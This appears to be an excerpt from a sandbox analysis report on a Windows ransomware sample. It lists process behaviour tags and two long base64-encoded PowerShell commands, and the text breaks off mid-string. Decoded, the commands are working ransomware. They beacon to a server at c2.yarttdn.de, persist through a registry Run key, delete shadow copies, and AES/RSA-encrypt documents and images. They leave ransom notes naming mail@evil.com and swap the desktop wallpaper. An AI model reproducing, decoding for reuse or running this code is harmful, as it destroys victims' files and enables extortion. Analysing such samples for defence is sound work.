AEEARQBVAEEAZQBBAEIAMABBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARAAwAEEASgB3AEIAdwBBAEcANABBAFoAdwBBAG4AQQBDAGsAQQBJAGcAQQBOAEEAQQBvAEEAVABBAEIAdgBBAEcAYwBBAEkAQQBBAGkAQQBHAFkAQQBiAHcAQgAxAEEARwA0AEEAWgBBAEEAZwBBAEMAUQBBAEsAQQBBAGsAQQBHAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEEAdQBBAEUAdwBBAFoAUQBCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEASQBBAEIAbQBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBJAEEAQgAwAEEARwA4AEEASQBBAEIAdwBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBJAEEARABRAEEASwBBAEMAUQBBAFoAZwBCAHAAQQBHAHcAQQBaAFEAQgB6AEEAQwBBAEEAZgBBAEEAZwBBAEMAVQBBAEkAQQBCADcAQQBDAEEAQQBSAFEAQgB1AEEARwBNAEEASwBBAEEAawBBAEYAOABBAEwAZwBCAE8AQQBHAEUAQQBiAFEAQgBsAEEAQwBrAEEASQBBAEIAOQBBAEEAMABBAEMAZwBCAE0AQQBHADgAQQBaAHcAQQBnAEEAQwBJAEEAYwBBAEIAeQBBAEcAOABBAFkAdwBCAGwAQQBIAE0AQQBjAHcAQgBsAEEARwBRAEEASQBBAEEAawBBAEcAYwBBAGIAQQBCAHYAQQBHAEkAQQBZAFEAQgBzAEEARABvAEEAWQB3AEEAZwBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQBpAEEAQQAwAEEAQwBnAEEAawBBAEcAUQBBAGEAUQBCAHkAQQBIAE0AQQBJAEEAQQA5AEEAQwBBAEEAUQBBAEIANwBBAEgAMABBAEQAUQBBAEsAQQBDAFEAQQBaAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEMAQQBBAGYAQQBBAGcAQQBDAFUAQQBJAEEAQgA3AEEAQwBBAEEASgBBAEIAawBBAEcAawBBAGMAZwBCAHoAQQBGAHMAQQBLAEEAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEwAUQBCAFEAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEASgBBAEIAZgBBAEMANABBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBwAEEARgAwAEEASQBBAEEAOQBBAEMAQQBBAEoAQQBCADAAQQBIAEkAQQBkAFEAQgBsAEEAQwBBAEEAZgBRAEEATgBBAEEAbwBBAEoAQQBCAGsAQQBHAGsAQQBjAGcAQgB6AEEAQwA0AEEAYQB3AEIAbABBAEgAawBBAGMAdwBBAGcAQQBIAHcAQQBJAEEAQQBsAEEAQwBBAEEAZQB3AEEAZwBBAEMASQBBAFcAUQBCAHYAQQBIAFUAQQBjAGcAQQBnAEEARwBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBBAGcAQQBHAEUAQQBjAGcAQgBsAEEAQwBBAEEAVABBAEIAUABBAEUATQBBAFMAdwBCAEYAQQBFAFEAQQBJAFEAQgBnAEEARwA0AEEAUQB3AEIAdgBBAEcANABBAGQAQQBCAGgAQQBHAE0AQQBkAEEAQQBnAEEARwAwAEEAWQBRAEIAcABBAEcAdwBBAFEAQQBCAGwAQQBIAFkAQQBhAFEAQgBzAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCADAAQQBHADgAQQBJAEEAQgB5AEEARwBVAEEAYwB3AEIAMABBAEcAOABBAGMAZwBCAGwAQQBDAEEAQQBlAFEAQgB2AEEASABVAEEAYwBnAEEAZwBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQBoAEEAQwBJAEEASQBBAEIAOABBAEMAQQBBAFQAdwBCADEAQQBIAFEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEkAZwBBAGsAQQBGADgAQQBYAEEAQQBoAEEARgBJAEEAUgBRAEIAVABBAEYAUQBBAFQAdwBCAFMAQQBFAFUAQQBJAFEAQQB1AEEASABRAEEAZQBBAEIAMABBAEMASQBBAEkAQQBCADkAQQBBADAAQQBDAGcAQgBNAEEARwA4AEEAWgB3AEEAZwBBAEMASQBBAGMAdwBCAGwAQQBIAFEAQQBkAEEAQgBwAEEARwA0AEEAWgB3AEEAZwBBAEgAYwBBAFkAUQBCAHMAQQBHAHcAQQBjAEEAQgBoAEEASABBAEEAWgBRAEIAeQBBAEMASQBBAEQAUQBBAEsAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEARgBNAEEAZQBRAEIAegBBAEgAUQBBAFoAUQBCAHQAQQBDADQAQQBUAGcAQgBsAEEASABRAEEATABnAEIAWABBAEcAVQBBAFkAZwBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAcABBAEMANABBAFIAQQBCAHYAQQBIAGMAQQBiAGcAQgBzAEEARwA4AEEAWQBRAEIAawBBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBLAEEAQQBpAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAE8AZwBBAHYAQQBDADgAQQBKAEEAQgB6AEEASABJAEEAZABnAEEAdgBBAEgAYwBBAFkAUQBCAHMAQQBHAHcAQQBjAEEAQgBoAEEASABBAEEAWgBRAEIAeQBBAEQAOABBAGEAUQBCAHcAQQBEADAAQQBKAEEAQgB0AEEASABrAEEAYQBRAEIAdwBBAEMASQBBAEwAQQBBAGcAQQBDAEkAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFQAUQBCAFEAQQBGAHcAQQBkAHcAQgBoAEEARwB3AEEAYgBBAEIAdwBBAEgAQQBBAEwAZwBCAHcAQQBHADQAQQBaAHcAQQBpAEEAQwBrAEEARABRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBTAFEAQgAwAEEARwBVAEEAYgBRAEIAUQBBAEgASQBBAGIAdwBCAHcAQQBHAFUAQQBjAGcAQgAwAEEASABrAEEASQBBAEEAdABBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBnAEEAUwB3AEIARABBAEYAVQBBAE8AZwBCAGMAQQBFAE0AQQBiAHcAQgB1AEEASABRAEEAYwBnAEIAdgBBAEcAdwBBAEkAQQBCAFEAQQBHAEUAQQBiAGcAQgBsAEEARwB3AEEAWABBAEIARQBBAEcAVQBBAGMAdwBCAHIAQQBIAFEAQQBiAHcAQgB3AEEARgB3AEEASgB3AEEAZwBBAEMAMABBAGIAZwBCAGgAQQBHADAAQQBaAFEAQQBnAEEASABjAEEAWQBRAEIAcwBBAEcAdwBBAGMAQQBCAGgAQQBIAEEAQQBaAFEAQgB5AEEAQwBBAEEATABRAEIAMgBBAEcARQBBAGIAQQBCADEAQQBHAFUAQQBJAEEAQQBpAEEAQwBRAEEAWgBRAEIAdQBBAEgAWQBBAE8AZwBCAFUAQQBFADAAQQBVAEEAQgBjAEEASABjAEEAWQBRAEIAcwBBAEcAdwBBAGMAQQBCAHcAQQBDADQAQQBjAEEAQgB1AEEARwBjAEEASQBnAEEATgBBAEEAbwBBAFoAdwBCAGoAQQBHAGsAQQBJAEEAQgBTAEEARwBVAEEAWgB3AEIAcABBAEgATQBBAGQAQQBCAHkAQQBIAGsAQQBPAGcAQQA2AEEARQBnAEEAUwB3AEIARgBBAEYAawBBAFgAdwBCAFYAQQBGAE0AQQBSAFEAQgBTAEEARgBNAEEASQBBAEIAOABBAEMAQQBBAFUAdwBCAGwAQQBHAHcAQQBaAFEAQgBqAEEASABRAEEASQBBAEIAQQBBAEgAcwBBAGIAZwBCAGgAQQBHADAAQQBaAFEAQQA5AEEAQwBJAEEAVQB3AEIASgBBAEUAUQBBAEkAZwBBADcAQQBHAFUAQQBlAEEAQgB3AEEASABJAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBQAFEAQgA3AEEAQwBRAEEAWAB3AEEAdQBBAEYAQQBBAFUAdwBCAEQAQQBHAGcAQQBhAFEAQgBzAEEARwBRAEEAVABnAEIAaABBAEcAMABBAFoAUQBCADkAQQBIADAAQQBJAEEAQgA4AEEAQwBBAEEASgBRAEEAZwBBAEgAcwBBAEkAQQBBAE4AQQBBAG8AQQBVAHcAQgBsAEEASABRAEEATABRAEIASgBBAEgAUQBBAFoAUQBCAHQAQQBGAEEAQQBjAGcAQgB2AEEASABBAEEAWgBRAEIAeQBBAEgAUQBBAGUAUQBBAGcAQQBDADAAQQBjAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMASQBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAYwBnAEIANQBBAEQAbwBBAE8AZwBCAEkAQQBFAHMAQQBSAFEAQgBaAEEARgA4AEEAVgBRAEIAVABBAEUAVQBBAFUAZwBCAFQAQQBGAHcAQQBKAEEAQQBvAEEAQwBRAEEAWAB3AEEAdQBBAEYATQBBAFMAUQBCAEUAQQBDAGsAQQBYAEEAQgBEAEEARwA4AEEAYgBnAEIAMABBAEgASQBBAGIAdwBCAHMAQQBDAEEAQQBVAEEAQgBoAEEARwA0AEEAWgBRAEIAcwBBAEYAdwBBAFIAQQBCAGwAQQBIAE0AQQBhAHcAQgAwAEEARwA4AEEAYwBBAEIAYwBBAEMASQBBAEkAQQBBAHQAQQBHADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEIAMwBBAEcARQBBAGIAQQBCAHMAQQBIAEEAQQBZAFEAQgB3AEEARwBVAEEAYwBnAEEAZwBBAEMAMABBAGQAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASQBnAEEAawBBAEcAVQBBAGIAZwBCADIAQQBEAG8AQQBWAEEAQgBOAEEARgBBAEEAWABBAEIAMwBBAEcARQBBAGIAQQBCAHMAQQBIAEEAQQBjAEEAQQB1AEEASABBAEEAYgBnAEIAbgBBAEMASQBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEARgBJAEEAVgBRAEIATwBBAEUAUQBBAFQAQQBCAE0AQQBEAE0AQQBNAGcAQQB1AEEARQBVAEEAVwBBAEIARgBBAEMAQQBBAGQAUQBCAHoAQQBHAFUAQQBjAGcAQQB6AEEARABJAEEATABnAEIAawBBAEcAdwBBAGIAQQBBAHMAQQBGAFUAQQBjAEEAQgBrAEEARwBFAEEAZABBAEIAbABBAEYAQQBBAFoAUQBCAHkAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBVAEEAQgBoAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGQAQQBCAGwAQQBIAEkAQQBjAHcAQQBOAEEAQQBvAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAFgAQQBHADAAQQBhAFEAQgBQAEEARwBJAEEAYQBnAEIAbABBAEcATQBBAGQAQQBBAGcAQQBGAGMAQQBhAFEAQgB1AEEARABNAEEATQBnAEIAZgBBAEYATQBBAGEAQQBCAGgAQQBHAFEAQQBiAHcAQgAzAEEARwBNAEEAYgB3AEIAdwBBAEgAawBBAEkAQQBCADgAQQBDAEEAQQBSAGcAQgB2AEEASABJAEEAUgBRAEIAaABBAEcATQBBAGEAQQBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAGUAdwBBAGsAQQBGADgAQQBMAGcAQgBFAEEARwBVAEEAYgBBAEIAbABBAEgAUQBBAFoAUQBBAG8AQQBDAGsAQQBPAHcAQgA5AEEAQQAwAEEAQwBnAEIAcABBAEcAWQBBAEkAQQBBAG8AQQBDAFEAQQBQAHcAQQBwAEEAQwBBAEEAZQB3AEEAZwBBAEUAdwBBAGIAdwBCAG4AQQBDAEEAQQBJAGcAQgBqAEEARwB3AEEAWgBRAEIAaABBAEgASQBBAFoAUQBCAGsAQQBDAEEAQQBkAGcAQgB6AEEASABNAEEASQBnAEEAZwBBAEgAMABBAEQAUQBBAEsAQQBHAFUAQQBiAEEAQgB6AEEARwBVAEEASQBBAEIANwBBAEMAQQBBAFQAQQBCAHYAQQBHAGMAQQBJAEEAQQBpAEEARwBNAEEAYgBBAEIAbABBAEcARQBBAGMAZwBBAGcAQQBIAFkAQQBjAHcAQgB6AEEAQwBBAEEAWgBnAEIAaABBAEcAawBBAGIAQQBCAGwAQQBHAFEAQQBJAEEAQQB0AEEAQwBBAEEAYwBBAEIAbABBAEgASQBBAGIAUQBCAHAAQQBIAE0AQQBjAHcAQgBwAEEARwA4AEEAYgBnAEIAegBBAEQAOABBAEkAZwBBAGcAQQBIADAAQQBEAFEAQQBLAEEARQB3AEEAYgB3AEIAbgBBAEMAQQBBAEkAZwBCAGsAQQBHADgAQQBiAGcAQgBsAEEAQwBJAEEAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwBjADIALgB5AGEAcgB0AHQAZABuAC4AZABlADoAMQA1ADMAMwAyAC8AbABvAGcAIgAgAC0AQgBvAGQAeQAgAEAAewBpAHAAPQAoAEcAZQB0AC0ATgBlAHQASQBQAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAEkAUAB2ADQARABlAGYAYQB1AGwAdABHAGEAdABlAHcAYQB5ACAALQBuAGUAIAAkAG4AdQBsAGwAIAAtAGEAbgBkACAAJABfAC4ATgBlAHQAQQBkAGEAcAB0AGUAcgAuAFMAdABhAHQAdQBzACAALQBuAGUAIAAiAEQAaQBzAGMAbwBuAG4AZQBjAHQAZQBkACIAfQApAC4ASQBQAHYANABBAGQAZAByAGUAcwBzAC4ASQBQAEEAZABkAHIAZQBzAHMAOwAgAG0AZQBzAHMAYQBnAGUAPQAiAFQAZQBzAHQAQwBhAHMAZQAgAFQAQwAwADQALwAwADUAIABpAG4AcwB0AGEAbABsAGkAbgBnACIAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBJAG4AdgBvAGsAZQAtAFcAbQBpAE0AZQB0AGgAbwBkACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAQwByAGUAYQB0AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBlAG4AYwAgACQAcABsACIADQAKACQAaQBkACAAPQAgACIAYQA4ADAAOAAyADUAOABkAC0AZABlAGIAMAAtADQAZgBhADIALQBiADQAOQBmAC0AMgA5AGEAMwBmADgAMAAyADQAMQBjADAAIgANAAoATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlACAALQBOAGEAbQBlACAAJABpAGQAIAAtAEUAQQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAkAGkAZAAiACAALQBOAGEAbQBlACAAIgBDAG8AZABlACIAIAAtAFYAYQBsAHUAZQAgACQAcABsACAALQBGAG8AcgBjAGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwANAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAaQBkACAALQBWAGEAbAB1AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AYwBvAG0AbQBhAG4AZAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAATQBpAG4AaQBtAGkAegBlAGQAIAAtAGUAbgBjACAAJAAoACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAYQA4ADAAOAAyADUAOABkAC0AZABlAGIAMAAtADQAZgBhADIALQBiADQAOQBmAC0AMgA5AGEAMwBmADgAMAAyADQAMQBjADAAIgApAC4AQwBvAGQAZQApACcAIAAtAEYAbwByAGMAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnAA0ACgANAAoA
2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden -enc JABzAHIAdgAgAD0AIAAiAGMAMgAuAHkAYQByAHQAdABkAG4ALgBkAGUAOgAxADUAMwAzADIAIgANAAoAJAB0AGMAIAA9ACAAIgBUAGUAcwB0AEMAYQBzAGUAIABUAEMAMAA0AC8AMAA1ACIADQAKACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIADQAKACQAbQB5AGkAcAAgAD0AIAAoAEcAZQB0AC0ATgBlAHQASQBQAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7AA0ACgAkAF8ALgBJAFAAdgA0AEQAZQBmAGEAdQBsAHQARwBhAHQAZQB3AGEAeQAgAC0AbgBlACAAJABuAHUAbABsACAALQBhAG4AZAAgACQAXwAuAE4AZQB0AEEAZABhAHAAdABlAHIALgBTAHQAYQB0AHUAcwAgAC0AbgBlACAAIgBEAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAiAA0ACgB9ACkALgBJAFAAdgA0AEEAZABkAHIAZQBzAHMALgBJAFAAQQBkAGQAcgBlAHMAcwANAAoAZgB1AG4AYwB0AGkAbwBuACAATABvAGcAIAB7AA0ACgBwAGEAcgBhAG0AKAAkAG0AcwBnACkADQAKACgAaQB3AHIAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvACQAcwByAHYALwBsAG8AZwAiACAALQBCAG8AZAB5ACAAQAB7AGkAcAA9ACQAbQB5AGkAcAA7ACAAbQBlAHMAcwBhAGcAZQA9ACIAJAB0AGMAIAAkAG0AcwBnACIAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAIAANAAoAfQANAAoATABvAGcAIAAiAHIAdQBuAG4AaQBuAGcAIgANAAoAJABwAHUAYgAgAD0AIAAnADwAUgBTAEEASwBlAHkAVgBhAGwAdQBlAD4APABNAG8AZAB1AGwAdQBzAD4AeQA4AFkAMABMAG8ATAAvADEAKwBCAEsAVQB2AHcAdgB0AGUAbQBvAFUATwAyADIAagA5AFUAeABtAE0ARwBpAFkAYQB0AE4AaABjAEYAbwA2ADIANgBRAEwAaQB1AGUAegBJAEIAYgBhAFgASwBVAGkAUABHAE4AZQB3AEkAYgBDADAAdAA0AG0AZgBFAEIAZABRACsAcAB3AGUAcQA0AFMATABJAHIASABZAHYAUgA2AGMAUAAzAHYASwBLAEUADQAKAFoAMABwAFEAKwBGAFEAMAB1ADQASQBzAFIAUgBhADMAbwBpAHgAUAA0AE4ATgBqAG8AQwB1ADUAdQBnAFgAUgB0AGUARgBnAGQAeABOAE0AVQBVAHoAKwA2AE0AegBkAEIAVwA5AHgAaAA4ADMAZQA3AGkAcQBXAHAAZQBmAGsASwBiADAAMgBrAFAAWgBwAGgAKwBVAD0APAAvAE0AbwBkAHUAbAB1AHMAPgA8AEUAeABwAG8AbgBlAG4AdAA+AEEAUQBBAEIAPAAvAEUAeABwAG8AbgBlAG4AdAA+ADwALwBSAFMAQQBLAGUAeQBWAGEAbAB1AGUAPgAnAA0ACgAkAFIAUwBBACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUgBTAEEAQwByAHkAcAB0AG8AUwBlAHIAdgBpAGMAZQBQAHIAbwB2AGkAZABlAHIADQAKACQAUgBTAEEALgBGAHIAbwBtAFgAbQBsAFMAdAByAGkAbgBnACgAJABwAHUAYgApAA0ACgAkAGcAbABvAGIAYQBsADoAYwAgAD0AIAAwAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABFAG4AYwAgAHsADQAKAHAAYQByAGEAbQAgACgAIAAkAHAAIAApAA0ACgB0AHIAeQAgAHsADQAKACQAawBlAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcgByAGEAeQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAGIAeQB0AGUAXQAsADMAMgApAA0ACgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AKQAuAE4AZQB4AHQAQgB5AHQAZQBzACgAJABrAGUAeQApAA0ACgAkAGsAZQB5AF8AZQBuAGMAIAA9ACAAJABSAFMAQQAuAEUAbgBjAHIAeQBwAHQAKAAkAGsAZQB5ACwAJAB0AHIAdQBlACkADQAKACQAQQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQADQAKACQAQQAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwANAAoAJABBAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAUABLAEMAUwA3AA0ACgAkAEEALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAANAAoAJABBAC4ASwBlAHkAUwBpAHoAZQAgAD0AIAAyADUANgANAAoAJABBAC4ASwBlAHkAIAA9ACAAJABrAGUAeQANAAoAJABBAC4ASQBWACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEANgANAAoAJABiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwACkADQAKACQAZQAgAD0AIAAkAGsAZQB5AF8AZQBuAGMAIAArACAAKAAkAEEALgBDAHIAZQBhAHQAZQBFAG4AYwByAHkAcAB0AG8AcgAoACkAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkADQAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHAALAAgACQAZQApAA0ACgBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AZQB3AE4AYQBtAGUAIAAiACQAcAAuAGMAcgBwAHQAIgANAAoAJABnAGwAbwBiAGEAbAA6AGMAKwArAA0ACgB9ACAAYwBhAHQAYwBoACAAewANAAoAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoAfQANAAoAJABmAGkAbABlAHMAIAA9ACAARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIAAtAFEAdQBlAHIAeQAgACIAUwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEMASQBNAF8ARABhAHQAYQBGAGkAbABlACAAVwBIAEUAUgBFACAATgBPAFQAIABOAGEAbQBlACAATABJAEsARQAgACcAYwA6AFwAXAB3AGkAbgBkAG8AdwBzAFwAXAAlACcAIABBAE4ARAANAAoAKABFAHgAdABlAG4AcwBpAG8AbgA9ACcAcABkAGYAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBkAG8AYwB4ACcAIABvAHIAIABFAHgAdABlAG4AcwBpAG8AbgA9ACcAZABvAGMAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwB4AGwAcwB4ACcAIABvAHIAIABFAHgAdABlAG4AcwBpAG8AbgA9ACcAeABsAHMAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBqAHAAZwAnACAAbwByACAARQB4AHQAZQBuAHMAaQBvAG4APQAnAGoAcABlAGcAJwAgAG8AcgAgAEUAeAB0AGUAbgBzAGkAbwBuAD0AJwBwAG4AZwAnACkAIgANAAoATABvAGcAIAAiAGYAbwB1AG4AZAAgACQAKAAkAGYAaQBsAGUAcwAuAEwAZQBuAGcAdABoACkAIABmAGkAbABlAHMAIAB0AG8AIABwAHIAbwBjAGUAcwBzACIADQAKACQAZgBpAGwAZQBzACAAfAAgACUAIAB7ACAARQBuAGMAKAAkAF8ALgBOAGEAbQBlACkAIAB9AA0ACgBMAG8AZwAgACIAcAByAG8AYwBlAHMAcwBlAGQAIAAkAGcAbABvAGIAYQBsADoAYwAgAGYAaQBsAGUAcwAiAA0ACgAkAGQAaQByAHMAIAA9ACAAQAB7AH0ADQAKACQAZgBpAGwAZQBzACAAfAAgACUAIAB7ACAAJABkAGkAcgBzAFsAKABTAHAAbABpAHQALQBQAGEAdABoACAAJABfAC4ATgBhAG0AZQApAF0AIAA9ACAAJAB0AHIAdQBlACAAfQANAAoAJABkAGkAcgBzAC4AawBlAHkAcwAgAHwAIAAlACAAewAgACIAWQBvAHUAcgAgAGYAaQBsAGUAcwAgAGEAcgBlACAATABPAEMASwBFAEQAIQBgAG4AQwBvAG4AdABhAGMAdAAgAG0AYQBpAGwAQABlAHYAaQBsAC4AYwBvAG0AIAB0AG8AIAByAGUAcwB0AG8AcgBlACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAhACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAIgAkAF8AXAAhAFIARQBTAFQATwBSAEUAIQAuAHQAeAB0ACIAIAB9AA0ACgBMAG8AZwAgACIAcwBlAHQAdABpAG4AZwAgAHcAYQBsAGwAcABhAHAAZQByACIADQAKACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AJABzAHIAdgAvAHcAYQBsAGwAcABhAHAAZQByAD8AaQBwAD0AJABtAHkAaQBwACIALAAgACIAJABlAG4AdgA6AFQATQBQAFwAdwBhAGwAbABwAHAALgBwAG4AZwAiACkADQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwAXABEAGUAcwBrAHQAbwBwAFwAJwAgAC0AbgBhAG0AZQAgAHcAYQBsAGwAcABhAHAAZQByACAALQB2AGEAbAB1AGUAIAAiACQAZQBuAHYAOgBUAE0AUABcAHcAYQBsAGwAcABwAC4AcABuAGcAIgANAAoAZwBjAGkAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAFMARQBSAFMAIAB8ACAAUwBlAGwAZQBjAHQAIABAAHsAbgBhAG0AZQA9ACIAUwBJAEQAIgA7AGUAeABwAHIAZQBzAHMAaQBvAG4APQB7ACQAXwAuAFAAUwBDAGgAaQBsAGQATgBhAG0AZQB9AH0AIAB8ACAAJQAgAHsAIAANAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACIAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBTAEUAUgBTAFwAJAAoACQAXwAuAFMASQBEACkAXABDAG8AbgB0AHIAbwBsACAAUABhAG4AZQBsAFwARABlAHMAawB0AG8AcABcACIAIAAtAG4AYQBtAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAC0AdgBhAGwAdQBlACAAIgAkAGUAbg